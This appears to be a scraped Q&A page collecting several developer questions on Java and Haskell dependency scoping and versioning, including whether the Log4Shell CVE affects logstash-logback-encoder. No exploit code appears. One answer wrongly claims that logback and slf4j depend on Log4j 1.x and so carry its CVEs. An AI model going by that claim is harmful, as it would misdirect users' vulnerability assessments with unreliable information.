log4j-slf4j2-impl does not include log4j-core, is this intentional? - log4j

I noticed that log4j-core has different dependency scope in the two slf4j-impl libraries.
Is this by design?
log4j-core scope
log4j-slf4j-impl
runtime
log4j-slf4j2-impl
test
Looks like it was changed with this commit, which references LOG4J2-2975. I don't see anything that mentions why the scope was changed from runtime to test.

Yes, removing the runtime dependency on log4j-core was intentional, since the log4j-slf4j2-impl module works with any implementation of the Log4j2 API.
Since version 2.17.2 at least two implementations can be used with the SLF4J-to-LOG4J2 bridge: log4j-core and log4j-to-jul (the third implementation maintained by the Log4j2 project, log4j-to-slf4j, can not be used for obvious reasons).
This choice was not undisputed: cf. LOG4J2 3601 for a discussion.

Related

How do indicate that a Haskell package is in either an alpha/beta/release candidate stage?

Let us say that I have worked on a haskell library and am now ready to release a beta version of the software to hackage/make repo public on github etc.
Possible Solutions and why they do not work for me
Use packagename-0.0.0.1-alpha or similar.
The problem here is quite simple: The Haskell PVP Specification does not allow it: (bold is me)
The components of the version number MUST be numbers! Historically Cabal supported version numbers with string tags at the end, e.g. 1.0-beta This proved not to work well because the ordering for tags was not well defined. Version tags are no longer supported and mostly ignored, however some tools will fail in some circumstances if they encounter them.
Just use packagename-0.* until it is out of alpha/beta (and then use packagename-1.*).
The problem here is twofold:
This method would not work for describing relase candidates which are post version 1.
Programmers from other ecosystems, such as that of rust, where it is quite common to have a stable library in 0.*, might wrongly assume that this library is stable. (Of course, it could be mitigated somewhat with a warning in the README, but I would prefer a better solution still.)
So, what is the best (and most conventional in haskell) way to indicate that the library version is in alpha/beta stage of development or is a release candidate?
As far as I know, there is not a package-wide way to say this. However, you can add a module description that describes the stability of the module to each of your modules' documentation.
{-|
Stability: experimental
-}
module PackageName.ModuleName where

Does the log4j vunerability CVE-2021-44228 affect logstash-logback-encoder

I would like the find out if the log4j security vulnerability CVE-2021-44228 (https://nvd.nist.gov/vuln/detail/CVE-2021-44228) affects logstash-logback-encoder?
Warning:
Alster's answer is technically correct, but it may be misleading to some people!
logstash, logback, and slf4j I think all use log4j-core-1.x... this means they are not vulnerable to CVE-2021-45046 ... CVE-2021-44228 ... CVE-2021-45105. See Apache's Log4J security bulletin.
HOWEVER logback usess Log4J version 1.x and Log4J version 1.2 IS VULNERABLE to CVE-2019-17571 and CVE-2021-4104 (keep reading for more info on these)
On the SLF4J website that Alster linked, the creators say that logback is safe from CVE-2021-45046 ... CVE-2021-44228 ... CVE-2021-45105 because it "does NOT offer a lookup mechanism at the message level". In other words, logback is not directly using the vulnerable JndiLookup.class file within Log4J...
HOWEVER (again), they do mention that Jndi lookup calls are possible from the logback config file. This is documented in CVE-2021-42550 with a severity score of CVSS 6.6. This severity is lower than the others because the exploit is harder to achieve for an attacker, thereby reducing the exposure... however the end result if an attacker were to be successful is the same: arbitrary remote code execution.
Additionally, the SLF4J website fails to mention the CVE's that are independently associated with their Log4J 1.x dependency that I linked above (CVE-2019-17571 and CVE-2021-4104). Those CVEs are not related to the JndiLookup.class file, so their statement "does NOT offer a lookup mechanism at the message level" is not a mitigation for these. They do actually talk about some of the details for CVE-2021-4104, but they do not reference the actual CVE documentation. They fail to mention altogether CVE-2019-17571.
YOU STILL NEED TO MAKE A CHANGE
CVE-2019-17571 has a severity score of CVSS 9.8...
This is an arbitrary remote code execution vulnerability (JUST LIKE CVE-2021-44228 that you asked about in your question).
CVE-2021-4104 has a severity score of CVSS 8.1...
This is also an arbitrary remote code execution vulnerability and in the description of it in the official documentation is says "that result in remote code execution in a similar fashion to CVE-2021-44228".
CVE-2021-42550 has a severity score of CVSS 6.6...
It is also an arbitrary remote code execution vulnerability
CVE-2021-44228 (which is the one that doesn't affect you) has a severity score of CVSS 10.
My recommendations
While it does seem possible to use logback safely if you smile at it just right and tweak 17 different configurations, and upgrade a package, and manually remove a class file from a jar... I do not feel comfortable giving you all of the specifics of that. While I have been trying to help people with the CVE-2021-45046 ... CVE-2021-44228 ... CVE-2021-45105 Log4J 2.x vulnerabilities... this software you are asking about is a whole different level of complexity and I'm not confident I could steer you in the right direction via a 1-time post without me or you missing crucial steps.
This package depends on software that reached end of life in 2015. My recommendation is that it's time to bite the bullet and upgrade to something that isn't holding on by a thread. I know that isn't what you were hoping to hear... I'm sorry.
Logback does NOT offer a lookup mechanism at the message level. Thus, it is deemed safe with respect to CVE-2021-44228.
reference

How should inter-related software packages be versioned?

Some open-source projects make combined releases where the version number of each package(library) is increased to the same version.
Examples in Java are:
org.springframework
com.fasterxml.jackson
org.hamcrest
This implies that some packages may get a new version even though they have not changed (nor their dependencies). I don't think this violates semantic versioning.
Benefits I see is that:
Users can use a single version to monitor and upgrade
All users likely to use the same combination of libraries
Drawbacks:
Users using just one out of many libraries might be notified about an "update" though the package to download has not changed
If many users use just a sub-package, then all bug reports for one version are equally for a range of versions, which is difficult to track. Reverting to the previous "different" version to avoid a bug becomes more complex.
One alternative to single-versioning is to use a BOM (Bill-of-materials).
Different concepts of BOMs exist:
A BOM can list several dependencies to include in their versions (e.g. Linux apt Meta-packages)
A BOM can define versions (and other restrictions) for dependencies to be used if the dependency is included (e.g. Java Maven dependencyManagement section of BOM)
The BOM allows to declare which configuration(combination) of library-versions have been tested together, and allows separate groups of users to all use the same configuration, helping with bug reports and reproducibility.
Not all software distribution and buildsystems support the BOM concept equally well, though.

JAXB (RI) libraries vs. JDK

Using maven, there are a couple of plugins to support e.g. generation of JAXB classes from XSD, e.g. org.codehaus.mojo:jaxb2-maven-plugin and org.jvnet.jaxb2.maven2:maven-jaxb2-plugin.
The newest version of those have dependencies to e.g. org.glassfish.jaxb:jaxb-xjc and org.glassfish.jaxb:jaxb-runtime (in version 2.2.11).
But I wonder what would happen if I used those to generate my classes from XSD but use JDK 8 only (which contains version 2.2.8) at runtime: wouldn't there be a risk that I get runtime errors?So is it necessary or recommended to always use the jaxb-runtime corresponding to the jaxb-xjc version I used to generate my classes from XSD?
Of course I could simply override the dependencies to jaxb-xjc etc. and explicitly use version 2.2.8. But even then I wonder if I would get the same result as if I used JDK 8 xjc tool directly?
You have three phases:
(1) generation of the schema-derived code
(2) compilation of the schema-derived code
(3) runtime
The most important that JAXB API you use to compile (2) is compatible with JAXB API you use in runtime (3). If this is not the case then you might compile code which uses some annotation which is later not available in the runtime. And you'll see the error first in the runtime.
As for (1) vs. (2), this is also necessary. If you generate with JAXB 2.2.x and use JAXB 2.1.x to compile, this will not necessarily work. But this is less critical as this will be a compilation error which you will be forced to correct.
So if you problem is just JAXB version used by the maven-jaxb2-plugin vs. JAXB version embedded in JDK, I wouldn't worry about this. As long as it compiles, you're as safe as you can ever be.

PropsValues in liferay

why we should not use any classes from portal-impl.jar inside your portlet?
In my case, how can I read PropsValues without adding portal-impl to maven dependencies.
I'm using Liferay 6.2
Thanks
#Origineil - in a comment to your question - gave you the alternative of what to do instead of using portal-impl.jar (e.g. use GetterUtil.getBoolean(PropsUtil.get(PropsKeys.SESSION_TIMEOUT_AUTO_EXTEND)); instead of PropsValues.SESSION_TIMEOUT_AUTO_EXTEND.
Why shouldn't you add portal-impl.jar to your project? Well, there are many reasons. First of all: It doesn't work. If you add portal-impl.jar to your plugin, there are quite a lot of spring components in there that would re-initialize - and they'd assume they're in the portal context. They'll be missing other code they're dependent on and you'd basically pull in a lot of Liferay's implementation and dependency code, making your plugin ridiculously big. And the initialization can't be done twice, so it won't even work anyways.
Plus, in portal-impl.jar you'll only find Liferay's implementation details - none of this code is ever promised to be stable. Not only will nobody care if you're depending on it, it'll most likely break your assumptions even on minor upgrades. Of course some components in there are more stable then others, but the basic assumption is a good one.
Liferay's API (that you're encouraged to use) lives in portal-service.jar. This is automatically available to all plugins and it contains the implementation mentioned above. Don't depend on someone's (Liferay's) internal implementation. Rather depend on the published API. If this means that you'll have to implement something again - so be it. It might be slightly less elegant, but a lot more future proof. And if you compare the size of portal-impl.jar to the amount of code that you'd duplicate in the case of PropsValues, you'll see that this single expansion is actually a nobrainer. Don't pull in 30M of code just because you'd rather type 30 characters than 60.

Resources